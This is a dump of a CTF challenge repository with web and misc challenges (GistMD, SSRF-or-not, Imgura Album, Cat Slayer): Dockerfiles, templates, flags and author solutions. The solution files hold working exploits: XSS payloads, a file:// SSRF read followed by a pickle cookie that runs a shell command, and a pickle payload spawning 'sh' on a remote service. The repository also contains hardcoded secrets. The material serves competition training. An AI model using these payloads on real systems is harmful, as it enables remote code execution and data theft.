24 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |
4 |

GistMD

5 |
6 | 7 | 8 | 9 |
10 | {% if error %}

{{ error }}

{% endif %} 11 |
12 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/new.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |

Creating Note

4 |
5 | 8 |
9 | 10 |
11 |

12 |

13 | 14 | Note: You can use Markdown syntax to format your note. 15 | If you want to insert a Github Gist you can use {%gist username/gist_id %} format. 16 | 17 |

18 |
19 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/note.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |

GistMD

4 |
5 | 11 | 12 | 15 | 16 | 22 |
23 |
Loading...
24 | 25 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | {% endblock %} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | uid = 1000 5 | gid = 1000 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | 2 | FROM python:3.9 3 | 4 | # I don't know why but only NTU mirror can install sid package of chromium 5 | RUN sed -i 's/deb.debian.org/debian.csie.ntu.edu.tw/' /etc/apt/sources.list 6 | RUN sed -i 's/security.debian.org/debian.csie.ntu.edu.tw/' /etc/apt/sources.list 7 | 8 | RUN apt update && \ 9 | apt install -y --no-install-recommends chromium-driver redis-server 10 | 11 | # Install latest chromium, I don't want this challenge become a browser pwn challenge 12 | RUN sed -i 's/bullseye /sid /' /etc/apt/sources.list 13 | RUN apt update && \ 14 | apt install -y --no-install-recommends chromium 15 | 16 | RUN rm -rf /var/lib/apt/lists/* 17 | 18 | RUN pip3 install --no-cache-dir selenium redis rq 19 | 20 | COPY xssbot.py /xssbot.py 21 | COPY run.sh /run.sh 22 | RUN chmod +x /run.sh 23 | 24 | RUN useradd --no-create-home --home-dir / --shell /bin/false user 25 | CMD bash /run.sh -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/bot/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | redis-server --protected-mode no & 3 | for _ in {1..4}; do 4 | rq worker & 5 | done 6 | sleep infinity 7 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.5" 2 | 3 | x-share-env: &share-env 4 | ADMIN_PASSWORD: MVc-QjY43XnysjKoIsrhos8-ruMS42kzstMj9CvMB1Y 5 | 6 | services: 7 | web: 8 | depends_on: 9 | - xss-bot 10 | build: ./app 11 | volumes: 12 | - ./app/:/app 13 | ports: 14 | - 8001:80/tcp 15 | environment: 16 | FLAG: FLAG{?callback=xss.h4ck3r} 17 | RECAPTCHA_PRIVATE_KEY: 18 | <<: *share-env 19 | 20 | xss-bot: 21 | build: ./bot 22 | environment: 23 | <<: *share-env -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/exploit/easy-unintended.txt: -------------------------------------------------------------------------------- 1 | title: (your javascript payload) 2 | 3 |
{%gist a %}<img src=/ onerror=eval(GistMD.title)>
4 | 5 | first found by nella17@meow? 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/exploit/intended.py: -------------------------------------------------------------------------------- 1 | import secrets 2 | import requests 3 | 4 | BASE_URL = 'https://gist.splitl.in/' 5 | 6 | user = secrets.token_urlsafe(8) 7 | pwd = secrets.token_urlsafe(8) 8 | 9 | print(user, pwd) 10 | 11 | payload = ''' 12 | 13 | CLOBBERED 14 | 15 | {%gist schacon/1.json?callback=top.document.all[14].click# %} 16 | ''' 17 | req = requests.session() 18 | 19 | req.post(BASE_URL+'/login', data={'username': user, 'password': pwd}) 20 | 21 | r = req.post(BASE_URL+'/new', data={'title': 'a\nb','content': payload}, allow_redirects=True) 22 | 23 | print(r.url) 24 | 25 | 26 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:latest 2 | 3 | RUN mkdir -p /usr/src/app 4 | WORKDIR /usr/src/app 5 | COPY ./app . 6 | 7 | RUN npm install 8 | 9 | CMD [ "node", "app.js" ] 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/flag.json: -------------------------------------------------------------------------------- 1 | "星🔵Starburst⚔️ꜱᴜᴛᴏʀɪᴍᴜ⚫爆" -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "body-parser": "^1.19.1", 4 | "ejs": "^3.1.6", 5 | "express": "^4.17.2", 6 | "sqlite3": "^5.0.2" 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/link-start.mp4: -------------------------------------------------------------------------------- 1 | // https://ani.gamer.com.tw/animeVideo.php?sn=926 -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/start.png -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/uso.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/uso.jpeg -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/welcome.mp4: -------------------------------------------------------------------------------- 1 | // https://ani.gamer.com.tw/animeVideo.php?sn=926 -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/welcome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/happy-metaverse-year/app/public/welcome.png -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/app/views/failed.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | GG 9 | 17 | 18 | 19 | 20 | 21 |

You are not STARBURST enough.

22 | 23 | 24 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/happy-metaverse-year/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - 8003:80/tcp 8 | user: "1000:1000" 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8-apache 2 | 3 | # enable Apache rewrite module 4 | RUN a2enmod rewrite 5 | 6 | # Install php extensions 7 | RUN apt update && apt install -y libzip-dev && docker-php-ext-install zip 8 | 9 | # initialize the web application 10 | COPY ./src/ /var/www/ 11 | RUN chmod 1733 /var/www/html/uploads 12 | RUN chmod 1733 /tmp 13 | 14 | # install composer 15 | RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer 16 | RUN cd /var/www/ && composer install 17 | 18 | # Set up flag & readflag for CTF 19 | COPY ./flag/readflag.c /readflag.c 20 | COPY ./flag/flag /flag 21 | RUN chmod 0400 /flag && chown root:root /flag 22 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 23 | RUN chown root:root /readflag && chmod 4555 /readflag 24 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - 8000:80/tcp 8 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/flag/flag: -------------------------------------------------------------------------------- 1 | FLAG{4lbums_pwn3ddd} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char *argv[]) { 4 | seteuid(0); 5 | setegid(0); 6 | setuid(0); 7 | setgid(0); 8 | 9 | if(argc < 5) { 10 | printf("Usage: %s give me the flag\n", argv[0]); 11 | return 1; 12 | } 13 | 14 | if ((strcmp(argv[1], "give") | strcmp(argv[2], "me") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) { 15 | puts("You are not worthy"); 16 | return 1; 17 | } 18 | 19 | char flag[256] = { 0 }; 20 | FILE* fp = fopen("/flag", "r"); 21 | if (!fp) { 22 | perror("fopen"); 23 | return 1; 24 | } 25 | if (fread(flag, 1, 256, fp) < 0) { 26 | perror("fread"); 27 | return 1; 28 | } 29 | puts(flag); 30 | fclose(fp); 31 | return 0; 32 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "require": { 3 | "mikecao/flight": "^2.0" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/html/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine On 2 | RewriteCond %{REQUEST_FILENAME} !-f 3 | RewriteCond %{REQUEST_FILENAME} !-d 4 | RewriteRule ^(.*)$ index.php [QSA,L] 5 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/html/uploads/.htaccess: -------------------------------------------------------------------------------- 1 | # Deny all requests other than /uploads/[album-id]/[filename].{jpg,jpeg,png} 2 | 3 | RewriteCond %{REQUEST_URI} !^/uploads/([a-z0-9]{16})/.+(jpe?g|png)$ [NC] 4 | RewriteRule .* - [F,L] 5 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/lib/class.user.php: -------------------------------------------------------------------------------- 1 | username = $username; 9 | } 10 | 11 | public function getUsername() 12 | { 13 | return $this->username; 14 | } 15 | 16 | public function getAlbums() 17 | { 18 | return $this->albums; 19 | } 20 | 21 | public function addAlbum($album) 22 | { 23 | $this->albums[] = $album; 24 | } 25 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/lib/inc.common.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |

« Back

4 | 5 | 6 |

[+] Upload image for this album:

7 |
8 | 9 | 10 |
11 | 12 | 13 | listAll() as $file) : ?> 14 |
15 | <?= $file['name'] ?> 16 |
17 |
18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/footer.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 |

© Imgura Album

5 |
6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/header.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Imgura::Album 9 | 25 | 26 | 27 | 28 |

29 |
30 |
-------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/home.php: -------------------------------------------------------------------------------- 1 | 2 |

Welcome, @getUsername() ?>.

3 | 4 |
Home | Create new album 5 |

Your albums:

6 |
    7 | getAlbums() as $album) : ?> 8 |
  1. [Album]
  2. 9 | 10 |
11 | 12 | getAlbums())) : ?> 13 | (No albums found) 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/imgura-album/src/views/login.php: -------------------------------------------------------------------------------- 1 | 2 |
3 | 4 | 5 |
6 | 7 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.0-fpm 2 | 3 | RUN apt-get update -y && apt-get install -y nginx 4 | 5 | RUN echo 'disable_functions = "shell_exec, system"' >> /usr/local/etc/php/conf.d/docker-php.ini; 6 | RUN echo 'max_execution_time = 3' >> /usr/local/etc/php/conf.d/docker-php.ini; 7 | RUN echo "request_terminate_timeout = 3" >> /usr/local/etc/php-fpm.d/www.conf; 8 | 9 | COPY nginx-site.conf /etc/nginx/sites-enabled/default 10 | COPY entrypoint.sh /etc/entrypoint.sh 11 | RUN chmod +x /etc/entrypoint.sh 12 | 13 | COPY ./src /var/www/html 14 | RUN chmod -R 755 /var/www/html 15 | RUN chown root:root /var/www/html 16 | 17 | WORKDIR /var/www/html 18 | 19 | # Set up flag & readflag for CTF 20 | COPY ./flag/readflag.c /readflag.c 21 | COPY ./flag/flag /flag 22 | RUN chmod 0400 /flag && chown root:root /flag 23 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 24 | RUN chown root:root /readflag && chmod 4555 /readflag 25 | 26 | EXPOSE 80 27 | ENTRYPOINT ["/etc/entrypoint.sh"] -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - 8005:80/tcp 8 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | service nginx start 3 | php-fpm 4 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/exploit/solution.txt: -------------------------------------------------------------------------------- 1 | just gopher ssrf -> fpm 2 | old trick :D 3 | there are a lot of exploits on the internet. 4 | 5 | 題目敘述四重雙關(嚴格來說是 C4取2 共六重): 6 | [P]rogram [M]anagement 7 | F[PM] 8 | [P]eko[M]iko 9 | [P]HP [M]alware 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/flag/flag: -------------------------------------------------------------------------------- 1 | FLAG{g0pher://finally a real ssrf challenge, and this should be a missing lab for edu-ctf students?} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char *argv[]) { 4 | seteuid(0); 5 | setegid(0); 6 | setuid(0); 7 | setgid(0); 8 | 9 | if(argc < 5) { 10 | printf("Usage: %s give me the flag\n", argv[0]); 11 | return 1; 12 | } 13 | 14 | if ((strcmp(argv[1], "give") | strcmp(argv[2], "me") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) { 15 | puts("You are not worthy"); 16 | return 1; 17 | } 18 | 19 | char flag[256] = { 0 }; 20 | FILE* fp = fopen("/flag", "r"); 21 | if (!fp) { 22 | perror("fopen"); 23 | return 1; 24 | } 25 | if (fread(flag, 1, 256, fp) < 0) { 26 | perror("fread"); 27 | return 1; 28 | } 29 | puts(flag); 30 | fclose(fp); 31 | return 0; 32 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/nginx-site.conf: -------------------------------------------------------------------------------- 1 | server { 2 | root /var/www/html; 3 | include /etc/nginx/default.d/*.conf; 4 | 5 | index index.php index.html index.htm; 6 | 7 | client_max_body_size 30m; 8 | 9 | location / { 10 | try_files $uri $uri/ /index.php$is_args$args; 11 | } 12 | 13 | location ~ [^/]\.php(/|$) { 14 | fastcgi_split_path_info ^(.+?\.php)(/.*)$; 15 | fastcgi_param HTTP_PROXY ""; 16 | fastcgi_pass 127.0.0.1:9000; 17 | fastcgi_index index.php; 18 | fastcgi_keep_conn off; 19 | include fastcgi.conf; 20 | } 21 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/src/admin.php: -------------------------------------------------------------------------------- 1 | 被駭掉ㄌ wwwww 2 | 3 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/pm/src/phpinfo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN chmod 1733 /tmp 4 | 5 | RUN pip install --no-cache-dir bottle gunicorn 6 | 7 | RUN apt update && apt install -y --no-install-recommends nginx 8 | 9 | CMD ["bash", "/start.sh"] 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/app/configs/__init__.py: -------------------------------------------------------------------------------- 1 | secret = "cCySMEDJ9LOlStFzu-k9HE0XUZIkGlGqMkDOBHOldXI" 2 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/app/views/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 |

Is this an SSRF challenge?

13 |
14 |

URLs you've tried...

15 |
    16 | % for item in payloads: 17 |
  1. {{item}}
  2. 18 | % end 19 | % if len(payloads) == 0: 20 |
  3. (Nothing yet.)
  4. 21 | % end 22 |
23 | 24 | 25 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: ./ 6 | volumes: 7 | - ./app/:/sup3rrrrr/secret/server/:ro 8 | - ./start.sh:/start.sh:ro 9 | - ./flag:/h3y_i_4m_th3_fl4ggg:ro 10 | - ./nginx.conf:/etc/nginx/sites-available/default:ro 11 | ports: 12 | - 8004:80/tcp 13 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/exploit/easy-unintended.txt: -------------------------------------------------------------------------------- 1 | 1. file://127.00000.00000.0001/proc/mounts 2 | 2. file://127.00000.00000.0001/h3y_i_4m_th3_fl4ggg 3 | 4 | 果然還是不該偷懶用 mount ㄉ 5 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/exploit/intended.py: -------------------------------------------------------------------------------- 1 | import secrets 2 | import requests 3 | import pickle 4 | import hmac 5 | import base64 6 | import hashlib 7 | 8 | import bottle 9 | 10 | BASE_URL = 'https://ssrf.h4ck3r.quest' 11 | 12 | req = requests.session() 13 | req.get(BASE_URL) # Get the cookie 14 | 15 | 16 | # get secret key 17 | secret = req.get(BASE_URL + '/proxy', 18 | params={'url': 'file://127.01/sup3rrrrr/secret/server/configs/__init__.py'}).text.split('=')[1].strip()[1:-1] 19 | 20 | print('secret =', secret) 21 | 22 | 23 | class Exploit: 24 | def __reduce__(self): 25 | return (eval, ('__import__("os").popen("cat /*f*").read()',)) 26 | 27 | 28 | exp = bottle.cookie_encode( 29 | ('session', {"payloads": [Exploit()]}), 30 | secret 31 | ).decode() 32 | 33 | print("cookie exploit =", exp) 34 | 35 | print(requests.get(BASE_URL, cookies={'session': exp}).text) 36 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/flag: -------------------------------------------------------------------------------- 1 | FLAG{well, maybe not? XD} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/nginx.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80 default_server; 3 | server_name _; 4 | 5 | location / { 6 | include proxy_params; 7 | proxy_pass http://127.0.0.1:8000/; 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/ssrf-or-not/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | nginx 4 | 5 | while true; do 6 | # 10 minutes 7 | timeout 600 gunicorn \ 8 | --workers 8 \ 9 | --access-logfile - \ 10 | --error-logfile - \ 11 | --bind 127.0.0.1:8000 \ 12 | --user 1000 \ 13 | --group 1000 \ 14 | --chdir /sup3rrrrr/secret/server/ \ 15 | main_server:app 16 | echo "Restarting server..." 17 | done 18 | -------------------------------------------------------------------------------- /ais3-eof/2023-quals/misc-rce/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.10 2 | 3 | COPY ./app /app 4 | 5 | RUN echo "FLAG{this_is_a_fake_flag}" > /flag 6 | RUN chmod 0400 /flag && chown root:root /flag 7 | -------------------------------------------------------------------------------- /ais3-eof/2023-quals/misc-rce/app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, send_file 2 | 3 | import multiprocessing 4 | import os 5 | 6 | app = Flask(__name__) 7 | 8 | 9 | def run(code): 10 | os.setgid(65534) 11 | os.setuid(65534) 12 | 13 | import contextlib 14 | import io 15 | with contextlib.redirect_stdout(io.StringIO()) as f: 16 | exec(code, {}) 17 | return f.getvalue() 18 | 19 | 20 | @app.route('/') 21 | def index(): 22 | return send_file('index.html') 23 | 24 | 25 | @app.post('/exec') 26 | def do_exec(): 27 | code = request.json.get('code', '') 28 | p = multiprocessing.Pool(processes=1) 29 | result = p.apply_async(run, (code,)) 30 | try: 31 | return str(result.get(timeout=1)), 200 32 | except multiprocessing.TimeoutError: 33 | p.terminate() 34 | return 'err: timeout', 500 35 | except Exception as e: 36 | return f"err: {e}", 500 37 | 38 | 39 | if __name__ == '__main__': 40 | app.run() 41 | -------------------------------------------------------------------------------- /ais3-eof/2023-quals/misc-rce/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = app 3 | callable = app 4 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/README.md: -------------------------------------------------------------------------------- 1 | # Cat Slayer | Cloud Edition / Misc (500pts) 2 | 3 |
4 | 5 | ##### 【關於身為平凡高中生的我穿越成為異世界最強勇者在最終被魔王殺死後卻遇到女神獲得死亡回歸外掛再度轉生在第二人生無雙的那件事】 6 | 7 | `nc quiz.ais3.org 2222` 8 |
9 | 10 | --- 11 | 12 | **背景故事(與解題無關)** 13 | 14 | [[前情提要]](https://github.com/splitline/My-CTF-Challenges/tree/master/ais3-eof/2020-final/cat-slayer#background-story) 15 | 16 | 真是沒用啊我。我的這一生,沒打倒魔王也罷,連原世界都無法回去,再也無法見到家人們——尤其我那可愛的妹妹——一切就要這樣結束了嗎。 17 | 18 | / 19 | 20 | 「吶,冒險者,你醒了嗎?」 21 | 22 | 我微微的睜開眼,只見四周是一望無際的純白,而我似乎正坐在一張簡陋的木製椅上。 23 | 24 | 眼前的是一位少女,她身著一襲純白羽衣,雪白的長髮映襯了她紅潤的臉龐。等等,這劇本我熟悉,在第一次穿越時沒見到,這次死後總算見到了啊——所謂的「女神」。 25 | 26 | 她眨了眨那碧藍的雙眼,朝我緩緩走來,低頭翻了下手上的一疊文件,「你,看來是為了保護過馬路的小孩,而被迎面衝來的卡車撞死了呢。」 27 | 28 | 「?」 29 | 「呃,那不是我欸,我——」 30 | 31 | 「哦?」她打斷我的話,抬頭看了我一眼,清了下喉嚨,將文件翻了幾頁,「嗯,好,那麼,你看來是被隨機殺人的強盜刺殺而喪ㄇㄧㄥ⋯⋯」 32 | 33 | 「啊,那也不是我。」我擺了擺手。這女神到底來幹嘛的? 34 | 35 | 「嘖。」,她似乎露出了一絲的——不對,是很明顯的不耐煩,「所以說,你到底是怎麼來到這邊的啊,根據我上工這三個月的經驗隨便講這幾種理由都會中的說。」 36 | 37 | 「總之,我奮戰了一生,擊敗了無數的魔族,在最後的最後,被貓貓🐱魔王卡特路西法殺死了。」 38 | 39 | 「幹笑死那三小」 40 | 41 | 「?」 42 | 43 | 「?」 44 | 「沒,沒事。」她的身旁莫名其妙地開始散發出一圈圈金色光暈——嗯,好喔,不愧是女神——「冒險者啊,吾賜予你 死亡回歸 _Death Recursion_ 的能力,回到你所來的世界,再度向命運挑戰吧。」 45 | 46 | 「欸等——」 47 | 48 | 她話音剛落,我便瞬間進入了一道白光之中,看來我是要再度回去那個世界了呢。 49 | 50 | 繼續前進吧,我的*究極の闇黑の貓貓🐱の戰紀*。 51 | 52 | Author: splitline -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN pip install pycryptodome 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m cat_slayer_cloud 7 | COPY ./share /home/cat_slayer_cloud 8 | COPY ./xinetd /etc/xinetd.d/cat_slayer_cloud 9 | COPY ./flag "/#h3y_I'm_the_fl4ggg#" 10 | RUN chown -R root:root /home/cat_slayer_cloud 11 | RUN chmod -R 755 /home/cat_slayer_cloud 12 | 13 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | cat-slayer-cloud: 3 | build: ./ 4 | ports: 5 | - "2222:2222" 6 | expose: 7 | - "2222" 8 | environment: 9 | - KEY=EnR3vCSX7PFyCzekBVAMMIK0jICLL1Mx 10 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{mag1c_pick13_cut&paste} -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/cat_slayer_cloud/game.py 5 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/deploy/xinetd: -------------------------------------------------------------------------------- 1 | service cat_slayer_cloud 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/cat_slayer_cloud/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = cat_slayer_cloud 10 | bind = 0.0.0.0 11 | port = 2222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-cloud/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import pickle 3 | 4 | p = remote('quiz.ais3.org', 2222) 5 | 6 | # Original Pickle: b'\x80\x04U\x02osU\x06system\x93U\x02sh\x85R.' 7 | ''' 8 | 0: \x80 PROTO 4 9 | 2: U SHORT_BINSTRING 'os' 10 | 6: U SHORT_BINSTRING 'system' 11 | 14: \x93 STACK_GLOBAL 12 | 15: U SHORT_BINSTRING 'sh' 13 | 19: \x85 TUPLE1 14 | 20: R REDUCE 15 | 21: . STOP 16 | ''' 17 | 18 | # `(0` -> push&pop -> NOP 19 | payload = ('AAAAAAAA' + 20 | '\x80\x04U\x02osU\x06system' + '(0' + # [BLOCK1] 21 | 'AAAAAAAAAAAAAAA' + 22 | '\x93U\x0dsh #AAAAAAAAA' + # [BLOCK2] 23 | 'AAAAAAAAAAAAAAA' + 24 | '\x85R.') # [BLOCK3] 25 | 26 | p.sendlineafter("Name: ", payload) 27 | p.sendlineafter("Choose: ", "V") 28 | evil_pkl = p.recvline().split(b": ")[1].decode() 29 | p.sendline() 30 | 31 | exploit = evil_pkl[32*4:32*5]+evil_pkl[32*6:32*7]+evil_pkl[32*8:] 32 | print("[+] exp:", exploit) 33 | 34 | p.sendlineafter("Choose: ", "L") 35 | p.sendlineafter("Saved Data: ", exploit) 36 | p.interactive() 37 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/README.md: -------------------------------------------------------------------------------- 1 | # Cat Slayer Fake | Nekogoroshi / Welcome (100pts) 2 | 3 | BGM: https://youtu.be/9-NusuQ8JaA 4 | 5 | `TERM=xterm-256color ssh -p 5566 h173@quiz.ais3.org` 6 | 7 | --- 8 | 9 | Author: splitline feat. Hojo Satoko 10 | 11 | > Hint 1: 12 | > For pwntools scripting, the simplest way to connect is just using the follwing script: 13 | > 14 | > ```python 15 | > process('TERM=xterm-256color ssh -p 5566 h173@quiz.ais3.org', shell=True, stdin=PTY) 16 | > ``` 17 | 18 | > Hint 2: 19 | > Tutorial Video: https://youtu.be/2b3Oqo13-r0?t=1296 20 | > 21 | > 另外,題目敘述中提及的指令適用於 Linux / Unix-Like 的 shell,若使用 Windows 系統則需要安裝虛擬機或是 WSL (Windows Subsystem for Linux)。 -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt update 4 | RUN apt install ssh -qy 5 | RUN mkdir /run/sshd 6 | 7 | RUN adduser --disabled-password --gecos "" --shell /home/h173/lock.py h173 8 | RUN sed -i -re 's/^h173:[^:]+:/h173::/' /etc/passwd /etc/shadow 9 | RUN touch /home/h173/.hushlogin 10 | 11 | COPY ./ssh/sshd_config /etc/ssh/sshd_config 12 | COPY ./ssh/sshd /etc/pam.d/sshd 13 | 14 | CMD ["/usr/sbin/sshd", "-D"] -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cat-slayer-fake: 5 | build: ./ 6 | volumes: 7 | - ./lock.py:/home/h173/lock.py 8 | environment: 9 | - TERM=xterm-256color 10 | ports: 11 | - 5566:22/tcp 12 | - 7788:23/tcp -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def conn(): 5 | return process('sshpass -p h173 ssh -p 19527 h173@splitline.tw', shell=True, stdin=PTY) 6 | 7 | 8 | p = conn() 9 | key = 